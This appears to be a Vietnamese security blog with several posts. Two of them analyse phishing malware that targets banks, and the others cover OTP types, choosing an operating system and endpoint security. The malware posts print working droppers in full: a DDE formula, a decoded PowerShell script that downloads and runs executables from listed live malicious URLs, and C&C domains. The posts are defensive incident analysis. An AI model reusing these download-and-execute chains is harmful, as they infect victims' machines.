Ky0

Sunday, August 26, 2018

Chỉ là APT attack vô bank thôi mà làm quá

Đúng như tiêu đề, thực sự nếu đơn vị nào public ra ngoài internet hằng ngày hoặc đang có dịch vụ trọng yếu về kinh tế chính trị thì bị attack APT hay là các kiểu tấn công khác thì nhiều hơn cơm bữa. Vấn đề là bao nhiêu cái được phát hiện, bao nhiêu cái được xử lý, và xử lý ở mức độ nào mới quan trọng.

Lưu ý: Tất cả các link độc hại đều vẫn còn online, người đọc nên cẩn trọng khi click

Thôi vào vấn đề chính! Nghe đồn đợt này đang có tấn công APT nhắm vào banking, ATM gì gì đó, ... Góc nhìn của mình thì chuyện dĩ nhiên và rất bình thường :D

Ông anh làm bên ngân hàng bạn báo có mẫu APT mới đang attack, cá nhân mình rất đánh giá cao cảnh báo kiểu này. Đang bận đọc báo về tỉ phú-làm giàu không vì bán tài nguyên quốc gia hay đầu độc dân tộc-xử lý chuyện gia đình. Cũng ráng ngó qua em nó xíu :D
Nhìn lướt qua mấy kiểu APT attack gần đây thì toàn phishing đính kèm file các kiểu. Quanh đi quẩn lại chỉ có 3 loại, PDF, M$ Office và Exploit cả hai cái trên :v

Thì mẫu đầu tiên là PDF.

Nhận được file thì vài thủ thuật nhỏ ta biết định dạng file luôn mặc dù ông anh gửi đã modify để tránh trường hợp click nhầm :D

https://www.virustotal.com/#/file/21afdc9bba64dc35900871f6876efd426ca33a96535c0529dc8d55ad27678073/detection => Lúc đầu hình như chỉ có 4-5 AV detect được :D mà kệ mịa đi, không nên đặt niềm tin vào hãng trong những trường hợp này :v

Dễ dàng ta thấy(quen thói thích thể hiện từ thời phổ thông)

Thông thường thì ta quan tâm đến nhóm màu cam, nhưng trong trường hợp này thì chỉ cần màu đỏ là đủ rồi :D
Theo như kết quả từ mấy câu lệnh nhảm nhí thì nó drop ra một file *.iqy sau đó execute lên thôi mà :D

nó sẽ dowload file hxxp://g50e.com/dab.1 về và thực thi. Trong đó có đoạn code rất tầm thường như sau:

='cmd'|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -sta -nop -c IEX ((new-object net.webclient).downloadstring(\"http://g50e.com/dub.2\"))'!A0

Nhìn lướt qua thì thấy nó download thêm thằng nào nữa từ C&C server.

[430]$ curl http://g50e.com/dub.2
$cheds = "http://g50e.com/security",""foreach($ched in $cheds){

Try{

$tp = "$env:temp\total.exe"$wc = New-Object System.Net.WebClient$wc.DownloadFile($ched, $tp)Start-Process $tpbreak

}

Catch{}

}

Ờ thì download thêm một thanh niên nữa về execute lên thôi mà. Report thằng này là được rồi :D
https://www.virustotal.com/#/file/2b4f1c3755982b71bc709e4ddf101fd713f8d64fcbe1f251f4e22c8ffe69907b/detection
Đến đây là đi nhậu được rồi :D

Mẫu OLE

Mẫu tiếp theo là mình nhận trực tiếp từ khách hàng của mình, họ dùng mấy tool chuyên về web
https://www.virustotal.com/#/file/bc09a4f2218993ef8d3b9136ceee5f162c67fd27a5cd3a6b9a6ab5704c932e9b/detection
File *.pub có thể hơi lạ nhưng nó chỉ là OLE file mà thôi :D Nên đám này thường sẽ có hai hướng: 1 là exploit app, 2 là nhúng VBA.
Nhìn lướt qua thì nó nhúng VBA chắc luôn

Nhìn đoạn code là thấy ngu ngu rồi, không rõ ràng nên phải extract file kia ra đề biết nó download cái nồi gì về :D

Ừ thì đại loại nó download file hxxp://r48t.com/input về đổi tên thành appkey.exe và thực thi thôi
https://www.virustotal.com/#/file/5f8578deeaf3188ad284136f923afaff79b8334525bb26d9bd545f13627bb86d/detection
Đến giờ chẳng được mấy thằng AV detect.

Tổng kết
- Đừng bao giờ tin tưởng quá vào Anti-Virus
- C&C domain:

f67i.com
g78k.com
g50e.com
r48t.com

Thực ra còn vài mẫu nữa nhưng cơ chế chung cũng kiểu như vậy, và phần khác là một số anh em bank khác không gửi mẫu trực tiếp nên mình cũng không có cơ sở phân tích tiếp.
- Người làm an toàn thông tin cho bank nên làm gì:

Chặn ngay các truy cập đến domain và IP tương ứng
Rà soát lại hệ thống có bao nhiêu người đã tải malware về và xử lý.
Chặn luôn các email phát tán malware => Mai tỉnh thì update sau :v
Join cộng đồng làm security cho bank để chia sẻ các case nghi ngờ hoặc nhận thông tin cập nhật để phòng thủ tốt hơn.

Sunday, July 30, 2017

Phân tích vài mẫu mã độc nhúng trong File MS Word

Vào một buổi sáng đẹp trời, khách hàng thông báo rằng, họ nhận được rất nhiều email giả danh lãnh đạo :v trong email đó có rất nhiều đường link đáng ngờ, nên nhờ chúng tôi phân tích và đưa ra giải pháp xử lý.

Việc đầu tiên cần làm là chặn tất cả các kết nối đến các đường link độc hại trên. Một điều may mắn là hệ thống của khách hàng sử dụng proxy cho tất cả các kết nối internet nên việc chặn các trang web độc hại được thực hiện khá là nhanh chóng, hơn nữa việc log đầy đủ thông tin truy cập internet của người dùng sẽ dễ dàng xác định được số lượng người dùng đã click vào đường link độc hại hoặc đã bị nhiễm malware.

Dưới đây là các đường link độc hại mà chúng tôi thu thập được dựa trên các thông tin khách hàng cung cấp.

Lưu ý: Các link dưới đây có thể vẫn còn chứa những đoạn mã gây nguy hại cho máy tính của các bạn

hxxp://benbirdsong.com/DLZP020721/
hxxp://danielmerchen.com/TZEX247131/
hxxp://pkfans.com/KCOK937437/
hxxp://vafotografia.com.br/SUOZ110455/
hxxp://bradnance.com/ZRXE577815/

Sau khi tải hết các file từ các site trên về chúng tôi nhận thấy chỉ có duy nhất 2 mẫu chính mà thôi. Và cũng không có gì ngạc nhiên khi các antivirus không thể nhận diện được 2 mẫu này.

Làm việc với "em" đầu tiên https://virustotal.com/en/file/b5f30f3f12d8337750943f35a076e3c9690bd18505f7eb31101c98c72f454629/analysis/1500961161/

Dễ dàng ta thấy rằng hai file trên thuộc dạng file MS Word 97-2003

À đùa chút thôi 😄

Mẫu này không hề giống với mẫu RTF mà anh Kienmanowar đã phân tích.
Dùng thử tool Officemalscanner thì không thấy mã độc đâu hết 😕 Chắc là do nó chỉ có VBA script 😁

Thôi đành dùng bộ oletools vậy:

Nhìn cái mớ hổ lốn này cũng mệt 🙈 Làm đẹp nó lại với ViperMonkey 😈. Tập trung vào hàm Document_Open() và tính toán sơ bộ ta có một chuỗi base64:

cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9qcGdwaG90b2V2ZW50cy5jb20vdS8saHR0cDovL3Byb2RldmluYy5jb20vY3p3amZ1Z3dqLyxodHRwOi8vbGVjaGVsZW9uLmNvbS93cC1jb250ZW50L290dXhpLyxodHRwOi8vcnlhbmtlaXNlci5uZXQvdmtyc2dueWNzYS8saHR0cDovL3p2YXJnYS5jb20veXZ2c3AvJy5TcGxpdCgnLCcpOyRuYW1lID0gJHJhbmRvbS5uZXh0KDEsIDY1NTM2KTskcGF0aCA9ICRlbnY6dGVtcCArICdcJyArICRuYW1lICsgJy5leGUnO2ZvcmVhY2goJHVybCBpbiAkdXJscyl7dHJ5eyR3ZWJjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwuVG9TdHJpbmcoKSwgJHBhdGgpO1N0YXJ0LVByb2Nlc3MgJHBhdGg7YnJlYWs7fWNhdGNoe3dyaXRlLWhvc3QgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7fX0=

Giờ thì dễ dàng ta có đoạn code như sau:

powershell -WindowStyle Hidden
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://jpgphotoevents.com/u/,http://prodevinc.com/czwjfugwj/,http://lecheleon.com/wp-content/otuxi/,http://ryankeiser.net/vkrsgnycsa/,http://zvarga.com/yvvsp/'.Split(','); $name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
try{
$webclient.DownloadFile($url.ToString(), $path);
Start-Process $path;
break;
}catch{
write-host $_.Exception.Message;
}
}

Các link trên download về được 2 file .EXE khác nhau:

Tương tự với file https://virustotal.com/en/file/b5f30f3f12d8337750943f35a076e3c9690bd18505f7eb31101c98c72f454629/analysis/

Ta dễ dàng có được đoạn code sau:

powershell -WindowStyle Hidden
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://siindia.in/oagcmggpa/,http://www.todofrog.com/pzpk/,http://segurodecenalsinoct.segurox.es/gn/,http://rgv2.com/wjblnwy/,http://gracetheweb.co.uk/cdybh/'.Split(','); $name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
try{
$webclient.DownloadFile($url.ToString(), $path);
Start-Process $path;
break;
}catch{
write-host $_.Exception.Message;
}
}

Từ đống link trên ta thu được một file https://virustotal.com/en/file/7beddab6ff9b2c1049a7fc31becca3230e00be160505af10b287d5fa26d815b7/analysis/

Công việc tiếp theo là submit hết các file cho đám AV. Đồng thời rà soát lại log trên hệ thống tập trung và phối hợp với IThelpdesk tiến hành gỡ bỏ malware trên các máy đã bị nhiễm.

Đến đây tạm ổn rồi kéo anh em đi nhậu cho khỏe chứ không rảnh phân tích đám file EXE kia 😎

Link download mẫu cho bạn nào cần https://drive.google.com/open?id=0B6x4m_EtB2wBeTRKM0xhbWhQLVk sử dụng password kinh điển để giải nén.

Sunday, January 22, 2017

Đánh giá các loại OTP được sử dụng phổ biến hiện nay

Ngoài việc "kêu gào" người sử dụng dịch vụ ebanking rằng: "Bất cứ giao dịch online nào đòi hỏi nhập OTP đều sẽ khiến khách hàng mất tiền" thì ngân hàng cũng phải có trách nhiệm lựa chọn giải pháp OTP sao cho đảm bảo bảo mật cho dịch vụ ebanking cũng như các dịch vụ thanh toán trực tuyến khác.

Định Nghĩa

OTP - One Time Password là mật khẩu sử dụng một lần và được coi là lớp bảo vệ thứ hai cho các tài khoản ngân hàng điện tử, thanh toán trực tuyến hay e-mail, mạng xã hội.
Mã xác thực OTP là một chuỗi số hoặc một chuỗi kết hợp cả số với ký tự. Nhưng khác mật khẩu thông thường, mã xác thực OTP được tạo ra ngẫu nhiên không phải từ người dùng, chỉ sử dụng được một lần và sau đó không còn tác dụng. Thậm chí, thời hạn của mật khẩu OTP thường rất ngắn, có thể chỉ sau 30 giây, 60 giây hay một vài phút, nó sẽ vô tác dụng và lại được thay thế bằng mã mới.
OTP được sử dụng nhiều và rất phổ biến. Để chuyển tiền hay thực hiện một giao dịch trực tuyến, người dùng không chỉ dùng tài khoản và mật khẩu để đăng nhập mà còn cần nhập đúng mã xác thực OTP mới hoàn tất được giao dịch. Nhiều nhà cung cấp dịch vụ thư điện tử như Google hay mạng xã hội Facebook cũng sử dụng OTP là mật khẩu đăng nhập thứ hai, được yêu cầu sau khi nhập đúng mật khẩu cá nhân. Vì khi để lộ hay bị đánh cắp tài khoản và mật khẩu chính, kẻ xấu cũng không thể đăng nhập hay thực hiện giao dịch, chuyển tiền nếu không có mã OTP.
Có nhiều cách để người dùng nhận mã OTP, có thể thông qua thiết bị hay ứng dụng tạo mã, hoặc được nhà cung cấp gửi đến thông qua tin nhắn SMS, điện thoại hay e-mail.

Phân loại OTP

OTP Matrix

OTP Matrix – Thẻ xác thực là thẻ được một vài ngân hàng phát hành dùng để xác thực giao dịch qua Ebanking. Trên mỗi thẻ có in một bảng ma trận số gồm 64 ô số (8×8) khác nhau, và một số serial của thẻ. Khi khách hàng đăng ký sử dụng thẻ, nhân viên ngân hàng sẽ tiến hành đăng ký số serial kết nối với tài khoản Ebanking của khách hàng. Sau khi đăng ký thẻ xác thực, mỗi lần thực hiện giao dịch trên Ebanking, để xác thực lệnh hệ thống yêu cầu khách hàng nhập vào 3 tọa độ ô số ngẫu nhiên được chọn từ Thẻ xác thực.
Giả sử khách hàng có thẻ ma trận trên và hệ thống yêu cầu khách hàng nhập giá trị của các ô H3, D5, C4 thì các giá trị hợp lệ khách hàng cần nhập vào sẽ là 64, F3, 32

Ưu điểm:

Gọn nhẹ dễ mang theo
Chi phí triển khai thấp

Nhược điểm:

Dễ dàng bị sao chép thông tin
Nếu hacker cài keylog capture đủ số lần nhất định thì sẽ tạo lại được nội dung của thẻ Xác thực. => Vì lý do này nên các ngân hàng thường khuyến cáo đổi thẻ xác thực hàng năm, hoặc ngắn hơn.

SMS OTP

Screen-Shot-2016-08-13-at-3-36-8053-3246-1471078676.png

Mã xác thực OTP được ngân hàng hay nhà cung cấp dịch vụ gửi dưới dạng tin nhắn SMS đến số điện thoại mà người dùng đã đăng ký. So với Token Key, hình thức này đơn giản và phổ biến hơn nhiều. Không chỉ các ngân hàng, Google, Facebook hay Apple cũng sử dụng SMS OTP làm lớp bảo vệ thứ hai khi đăng nhập tài khoản.

Ưu điểm:

Dễ triển khai
Chi phí thấp (Tốn thêm chi phí gửi SMS)
Thuận tiện cho hầu hết khách hàng vì hầu như ai cũng dùng điện thoại di động

Nhược điểm:

Không nhận được mã SMS OTP khi điển thoại mất sóng, hoặc khi đi nước ngoài mà không cài đặt dịch vụ roaming.
Hiện nay việc sử dụng smartphone để giao dịch ebanking phổ biến, nên việc nhận SMS OTP trên chính điện thoại đang thực hiện giao dịch không đạt chuẩn 2-factor authentication. => Rủi ro khi điện thoại bị chiếm quyền điều khiển.
Dễ dàng bị đánh cắp bằng các thiết bị thu phát sóng GSM, Vì SMS không được mã hoá.

Smart OTP hay Smart Token

Đây là hình thức kết hợp giữa Token Key và SMS OTP, là một ứng dụng có thể cài đặt được trên smartphone, máy tính bảng Android hay iOS. Tại Việt Nam, Vietcombank và TPBank đang sử dụng hình thức này bên cạnh SMS OTP. Còn Google cũng cung cấp ứng dụng tạo mã xác thực OTP mang tên Google Authenticator.
Giống như Token Key, ứng dụng này trên điện thoại có khả năng tự sinh ra mã xác thực ngẫu nhiên sau một khoảng thời gian. Không như SMS OTP, Smart OTP hay Smart Token có thể cung cấp mã xác thực kể cả nơi không có sóng điện thoại và Internet.
Dù vậy, để có thể cài đặt các ứng dụng này và bắt đầu nhận được mã OTP, người dùng phải đăng ký với ngân hàng, nhà cung cấp dịch vụ hoặc xác thực thông qua SMS OTP. Bên cạnh đó, không thể có hai hoặc nhiều thiết bị sử dụng chung một ứng dụng tạo mã OTP.

Ưu điểm:

Chi phí triển khai thấp
Thuận tiện cho khách hàng sử dụng

Nhược điểm:

Vừa giao dịch và vừa lấy OTP trên smartphone không đạt chuẩn 2-factor authentication. => Rủi ro khi điện thoại bị cài malware hoặc chiếm quyền điều khiển.
Nếu code không tốt có thể gây nhiều rủi ro bảo mật cho khách hàng lẫn ngân hàng.

Token Key (Token Card)

Đây là thiết bị điện tử có khả năng tạo ra mã xác thực OTP. Nó tự động sinh ra các mã ngẫu nhiên sau mỗi phút mà không cần đến kết nối mạng Internet. Tuy nhiên, mỗi tài khoản ngân hàng phải đăng ký sử dụng một Token riêng và không dùng chung được. Sau một thời gian định kỳ, ngân hàng sẽ yêu cầu người dùng đổi một Token mới.

Ưu điểm:

Gọn nhẹ dễ dàng mang theo như một móc gắn chìa khoá
Sử dụng được mà không cần kết nối

Nhược điểm:

Là thiết bị rời và thường nhỏ gọn, Token Key dễ bị đánh cắp hoặc thất lạc. Một số loại thông dụng với thiết kế đơn giản cũng dễ bị xem trộm mật mã OTP.
Chi phí triển khai khá cao.
Pin của token chỉ hoạt động được một thời gian

Đối với Token Key của HSBC có độ mật khá cao vì Token Key còn có thêm lớp bảo mật bằng mã PIN trước khi đọc được OTP.

FIDO U2F

"U2F là chữ viết tắt của Universal 2nd Factor, hiểu nôm na đây là công nghệ xác minh hai bước có thể sử dụng ở mọi nơi. Công nghệ U2F do Google Security Team cùng với Yubico và NXP sáng chế và sau đó bàn giao lại cho FIDO Alliance. Tôi không tham gia sáng chế ra công nghệ này, nhưng tôi có hỗ trợ đánh giá bộ giao thức U2F. So với các công nghệ tương đương như SMS OTP hay RSA SecurID, U2F có những sáng tạo độc đáo làm cho nó an toàn và dễ sử dụng hơn." Trích từ https://vnhacker.blogspot.com/2016/08/fido-u2f-cong-nghe-xac-minh-hai-buoc.html

Ưu điểm:

Phòng chống được các tấn công phishing như vụ việc của vietcombank năm trước
Có thể dùng một thiết bị cho nhiều tài khoản khác nhau hoặc nhiều ngân hàng khác nhau tại Việt Nam(Nếu Ngân Hàng Nhà Nước có chủ trương).
Có nhiều loại thiết bị khác nhau hỗ trợ các giao thức như NFC, USB/USB-C, Bluetooth ...
Chi phí triển khai thấp vì đây là chuẩn mở

Khuyết điểm:

Giá thiết bị cao nhưng có thể sử dụng cho nhiều tài khoản.
Dễ dàng bị người khác đánh cắp và sử dụng => Có thiết bị FIDO U2F hỗ trợ bảo mật bằng vân tay, password nhưng hơi cồng kềnh và giá thành cũng cao hơn.

Saturday, December 24, 2016

Vì sao tôi sử dụng Macbook?

Việc lựa chọn hệ điều hành nào để phục vụ công việc và giải trí tuỳ thuộc vào sở thích và đặc thù công việc của mỗi người. Bài viết dựa trên quan điểm cá nhân của một người làm trong lĩnh vực An ninh thông tin(ANTT), đã từng xài qua Window(XP, Vista, 7, 8), Linux(Ubuntu, Arch Linux), và sau cùng là Mac OSX.

0x01 Windows

Thời còn sinh viên thì tôi thích tìm tòi học hỏi, nên những thứ bó buộc của Microsoft(M$) tôi rất bất bình, từ ngày "mặt trời chân lý chói qua tim"(GNU-OSS) thì lúc đó mở ra cho tôi một cánh cửa với rất nhiều thứ mới lạ => Từ đó tôi bắt đầu thích những thứ minh bạch và rõ ràng 😁.

Một sự thật không thể chối bỏ rằng hầu hết mọi người tiếp xúc với IT ở Việt Nam từ những năm 2000 đều bắt đầu từ hệ điều hành Windows - Cá nhân tôi thì bắt đầu từ game Counter Strike 1.3 và Warcraft III(và các custom map).

Sự phổ cập của hệ điều hành(OS) Window là cơ hội cho hầu hết mọi người trên thế giới tiếp cận với máy tính. Và OS mang lại thành công nhất cho M$ hiện nay vẫn là Windows XP.

Mặc dù Windows XP đã hết hạn hỗ trợ kỹ thuật từ ngày 8/8/2014 nhưng những hệ thống máy tính của các doanh nghiệp trên thế giới(đặc biệt ở Việt Nam) vẫn chiếm một tỷ lệ lớn.
Hầu hết các phiên bản Windows được cài đặt trên máy tính ở Việt Nam(VN) thời kỳ đầu đều là bản lậu. Đôi khi các bản windows lậu trên thị trường thường được khuyến mãi thêm backdoor
Sự bền bỉ và ổn định và không đòi hỏi cấu hình phần cứng cao của Windows XP luôn là một điều doanh nghiệp và các cá nhân đánh giá cao.

Thực sự đối với tôi Windows Vista một thất hại thảm bại của M$, vì nó quá nặng nề không tương thích nhiều phầm mềm phổ biến => Đối với enduser hay là gamer thì điều này cực kỳ tồi tệ. Khi Windows 7 được ra mắt thì có rất nhiều điểm cải thiện như: Hiệu năng, tương thích phần mềm, nhưng nó vẫn còn nhiều vấn đề chưa được giải quyết triệt để.

Ưu điểm:

Phổ biến và nhiều ứng dụng
Dễ dàng sử dụng phần mềm lậu với key hoặc keygen :D => Cá nhân tôi rất hiếm khi xài patch
Dễ dàng build một laptop hay PC với các cấu hình tuỳ theo nhu cầu với mức giá tốt.
Ngày càng hoàn thiện và gia tăng độ bảo mật.

Khuyết điểm:

Thời gian update quá lâu và dễ bị lỗi => Ai mà đang có việc gấp mà cần tắt laptop, nhưng bất chợt Windows hiện cái bảng update thì đúng là một cực hình.
Sau một thời gian sử dụng thì tốc độ xử lý chậm đi rõ rệt(trước đây thì khoảng 3 tháng thì tôi lại phải cài mới Windows) Đồng thời khi cài đặt lại thì tôi mất khá nhiều thời gian để cài đặt một máy tính hoàn chỉnh(Cài các app mới nhất, crack các app ...) để làm việc.
Yêu cầu phần cứng khá cao đặc biệt là các ứng dụng cho doanh nghiệp
Các malware từ trước tới nay hầu hết đều nhắm vào nền tảng này.
Mã nguồn đóng và phải trả phí.

Các phần mềm cài đặt thêm: Thông thường sau khi cài đặt Windows xong tôi thường gỡ bỏ các thành phần mặc định không sử dụng(Game, IE, Gadgets ...) sau đó mới cài đặt các phần mềm cần thiết.

Ccleaner => Phần mềm dọn dẹp rác trên windows và sửa lỗi registry. Ngoài ra tôi thấy Kaspersky PC Cleaner cũng là một tool hay.
LibreOffice => Bộ phần mềm văn phòng mã nguồn mở và miễn phí. Dĩ nhiên là LibreOffice không thể so sánh với M$ Office về mặt tính năng nhưng nó đáp ứng được hết nhu cầu văn phòng thông thường.
Chrome và Firefox => Mỗi trình duyệt đều có ưu điểm riêng nên tôi dùng cả 2 cho các mục đích khác nhau.
Unikey => Chương trình gõ tiếng việt miễn phí - Tôi thấy hiện nay hầu hết các bản unikey được cài đặt thì đều đã được mod lại hoặc tải từ nguồn không chính thống, điều này gây ra rất nhiều rủi ro cho máy tính của người dùng. Ngoài ra các bạn có thể chọn GoTiengViet nếu thích.
VLC hoặc K-lite mega codec => Chương trình xem phim mọi định dạng.
Skype => Chương trình chat chit, call meeting.
7-zip => Chương trình giải nén các loại file phổ biến(miễn phí và mã nguồn mở)
Ngoài ra còn nhiều phần mềm khác nhưng tôi thích xài mặc định của Windows hoặc add-on của các phần mềm(Antivirus, PDF, ...)

0x2 Linux

Lý do tôi sử dụng hệ điều hành này vì nghe nói "Linux là hệ điều hành dành cho hacker" và cái giá phải trả khi lần đầu cài đặt linux là toàn bộ dữ liệu bị xoá xạch - vì hồi đó không biết khái niệm "Định dạng ổ cứng" chính là format 😓

Có rất nhiều bản phân phối(distro) linux được xây dựng cho từng đối tượng với nhu cầu khác nhau. Tôi tạm chia ra làm 3 dạng bản phân phối đó là:

Dành cho Enduser: Ubuntu hay ArchLinux
Dành cho môi trường server: Redhat, CentOS và Suse Linux
Dành cho các nhu cầu đặc thù: Kali Linux, pfSense hay Security Onion

Linux là một hệ điều hành vô cùng mạnh mẽ và linh hoạt không những cho server mà còn cho cả enduser. Dĩ nhiên tuỳ theo trình độ và ý tưởng của người dùng mà tận dụng các sức mạnh của linux sẽ khác nhau. Cá nhân tôi thì tôi thích nhất trên linux là command line, secure connect(SSH, VPN) và firewall mặc định(iptables/netfilter).

Command line trên Linux mạnh mẽ và dễ dùng đến mức M$ phải đưa nó lên linux - Mặc dù trước đó M$ cũng đã xây dựng Power Shell nhưng nó quá phức tạp và khó sử dụng.

Thường thì mọi người hay nghĩ iptables chỉ dành cho môi trường doanh nghiệp nhưng nếu biết sử dụng cho nhu cầu cá nhân thì đây là một firewall cực tốt(Tôi sẽ hướng dẫn viết rule sau 😁). VD: Tôi có thể dễ dàng điều chỉnh các kết nối email đều phải đi qua VPN, Chặn hết các kết nối gửi dữ liệu ra bên ngoài quá nhiều(Trường hợp máy tính bị dính malware đánh cắp thông tin hoặc là zombie), Tự động ngắt kết nối đến tuoitre.vn, twitter.com, youtube.com ... nếu truy cập liên tục trong 2 tiếng(bớt thời gian xem mấy thứ linh tinh) ...

Ưu điểm:

Compiz => Giao diện đẹp lung linh của Linux
Cơ chế phân quyền chặt chẽ và ít nguy cơ nhiễm malware
Dễ dàng cấu hình, biên dịch các phần mềm cần thiết phù hợp với nhu cầu cá nhân.
Rất nhiều phần mềm hỗ trợ các công việc trong mảng an ninh thông tin và quản trị server
Mã nguồn mở và miễn phí => Mọi người có thể đọc hoặc điều chỉnh code của các ứng dụng theo nhu cầu cá nhân.
Dễ dàng tự động hoá công việc với cron và script
Log rất chi tiết và đầy đủ => Dễ dàng debug và tìm nguyên nhân khi có sự cố.

Khuyết điểm:

Phần đồ hoạ đẹp đẽ không tương thích với phần command line mạnh mẽ
Dễ bị treo và update quá nhiều
Có quá nhiều phiên bản với các nhu cầu khác nhau => khó để lựa chọn sao cho phù hợp.
Số lượng game và ứng dụng đặc thù cho một số lĩnh vực khá hiếm.
Khi cài đặt một phần mềm thì các gói phần mềm yêu cầu khác nhiều và dễ gây lỗi.

Các phần mềm cài đặt thêm: Thông thường thì khi cài đặt các bản linux đã đầy đủ hết các phần mềm. Thông thường tôi sẽ cài các phần mềm tối thiểu, sau đó cần cài thêm gì thì chỉ cần gõ vài dòng lệnh.

Chrome
Skype
VLC
7-zip
Virtual Box => Phần mềm tạo máy ảo để thử nghiệm malware hoặc cài OS khác
ClamAV hoặc AVG Anti-Virus

0x3 MacOS

macOS được xây dựng trên nền unix nên nếu bạn đã quen với linux thì hoàn toàn sử dụng thành thạo macOS. Và do Apple vừa thiết kế phần cứng và phát triển OS nên các máy tính chạy MacOS khá ổn định(không tính trường hợp hackintosh). Điểm khác biệt trên Mac OSX so với Linux là firewall sử dụng pf (trước đây là ipfw) thay cho iptables/netfilter. Đây cũng là loại firewall mặc định của bản phân phối linux firewall chuyên dụng pfSense. Cách sử dụng PF dạng command line cũng tương tự như iptables.

Mặc dù thời gian gần đây Apple có public source của macOS cho cộng đồng nhưng macOS vẫn chưa hoàn toàn trở thành Open Source đúng nghĩa.

Ưu điểm:

Hệ điều hành ổn định dễ dàng "reset to factory" và viết script tự động cài đặt các tool cần thiết.
Có đồng bộ hoá hình ảnh, danh bạ, mật khẩu, cài đặt, ... Và backup đầy đủ
Nhiều phần mềm cực kỳ hữu ích và đồng bộ với *nix
Có thể tuỳ biến nhiều ứng dụng theo ý thích
Cơ chế phân quyền chặt chẽ và ít bị nhiễm malware
Thời lượng pin khá tốt
Phần cứng thiết kế đẹp và bền bỉ.

Khuyết điểm:

Càng ngày giao diện càng "gay hoá"
Các hiệu ứng chuyển đổi khá ít
Các phụ kiện dễ hư hỏng và chi phí để thay thế quá mắc
Ngày càng rời xa nhu cầu của người dùng
Một số ứng dụng viết không tốt sẽ chiếm dung lượng RAM sau đó là tạo file swap đến khi đầy ổ cứng thì thì sẽ crash luôn cả OS(Tiêu biểu có safari).

Các phần mềm cài thêm:

Chrome
Skype
VLC
7-zip
GPG Suite : Ứng dụng mã hoá file và email
Virtual Box hoặc VMware Fusion
Và các phần mềm hữu ích và khá hay từ https://objective-see.com

0x04 Tổng kết

Tóm lại tiêu chí khi lựa chọn một máy tính để làm việc và sử dụng hàng ngày phải có các tiêu chí sau:

OS Hoạt động ổn định và giao diện đẹp
Cấu hình mạnh mẽ, thiết kế đẹp và thời lượng pin tốt
Dễ dàng cấu hình và điều chỉnh các thành phần của hệ thống
Command line
Log đầy đủ
Hỗ trợ backup cloud và tự động hoá công việc với script => Khi máy tính gặp sự cố có thể nhanh chóng restore hoặc chuyển sang một máy tính mới tiếp tục làm việc.
Đầy đủ các phần mềm hỗ trợ công việc.

Xét trên các khía cạnh đó thì đối với tôi Macbook với macOS đi kèm thoả mãn nhiều yêu cầu nhất nên tôi lựa chọn - Có thể các lập trình viên lại có lý do khác. Tuy nhiên khi ra mắt Macbook Pro mới đợt vừa rồi thì tôi cảm thấy Apple càng ngày càng đánh mất sự sáng tạo và dần trở thành những "thương lái bất lương". Thế nên trong các năm tới MacOS chưa chắc đã là sự lựa chọn thông minh. Khi mà M$ ngày càng sáng tạo và hoàn thiện các sản phẩm của mình như: Surface Book hay Surface Studio. Và Linux đang phát triển thân thiện với Enduser hơn.

Wednesday, October 26, 2016

Security for Endpoint, What is Solution for Your Organization?

Trong năm vừa qua Việt Nam chứng kiến hàng loạt vụ tấn công vào các doanh nghiệp tổ chức lớn (TPBank, Vietnam Airline ... ). Mặc dù các doanh nghiệp trên đều có trang bị rất nhiều giải pháp và thiết bị bảo mật đắt tiền, nhưng nó không hề giúp các doanh nghiệp đó an toàn trước các cuộc tấn công của tội phạm mạng. Lý do một phần là các cơ quan tổ chức trên thiếu một đội ngũ làm an toàn thông tin lành nghề phần khác là họ quá tin tưởng vào các giải pháp bảo mật mà họ đã trang bị.

Vậy bài toán đặt ra là doanh nghiệp phải làm gì để bảo vệ người dùng cuối(Enduser) trước các mối đe doạ tấn công trên Internet - Những người dùng rất "ngây thơ" về vấn đề an toàn thông tin? Câu trả lời hầu hết là đào tạo nhận thức an toàn thông tin cho nhân viên và khách hàng?!? Nhưng thực tế thì việc này cực kỳ khó, vì ngay cả các chuyên gia phân tích malware hàng đầu đôi lúc vẫn bị nhiễm malware vì một vài sai sót(human error).

Vậy nên đứng ở góc độ làm bảo mật cho doanh nghiệp thì các chuyên gia phải có trách nhiệm nghiên cứu giải pháp làm thế nào để bảo vệ người dùng cuối bằng các biện pháp kỹ thuật.

Các giải pháp bảo vệ cho người dùng cuối hiện nay thông thường các doanh thường sử dụng là Anti-Virus, hay các giải pháp nghe tên hoành tráng hơn là "Giải pháp phòng chống APT".

Từ Tetcon 2012 đến các nghiên cứu bảo mật gần đây của Tavis Ormandy chứng minh rằng các Anti-Virus đã và đang trở thành mục tiêu của hacker và các giải pháp Anti-Virus đều tồn tại lỗ hổng bảo mật.
Các giải pháp phòng chống APT đang được chào bán hiện nay cũng chỉ là một giải pháp cải tiến của IDS/IPS kết hợp với DNS Sinkhole mà thôi. Hơn nữa một số chuyên gia dự đoán tương lai của các giải pháp phòng chống APT này sẽ dịch chuyển về phía Endpoint.

Trong một chia sẻ tại Security Bootcamp 2016 tôi có đề cập sơ qua về chủ đề này, Bây giờ tôi sẽ đi sâu vào phân tích các giải pháp mà tôi đã tìm hiểu và PoC trong năm vừa qua. Thực sự tôi muốn làm nhiều hơn việc test tính năng của các giải pháp Endpoint Security(Chẳng hạn tìm các lỗ hổng bảo mật và exploit :D) nhưng thời gian và nhân lực có hạn nên tôi sẽ bổ sung trong tương lai vậy.

1. Vulnerability Scanning

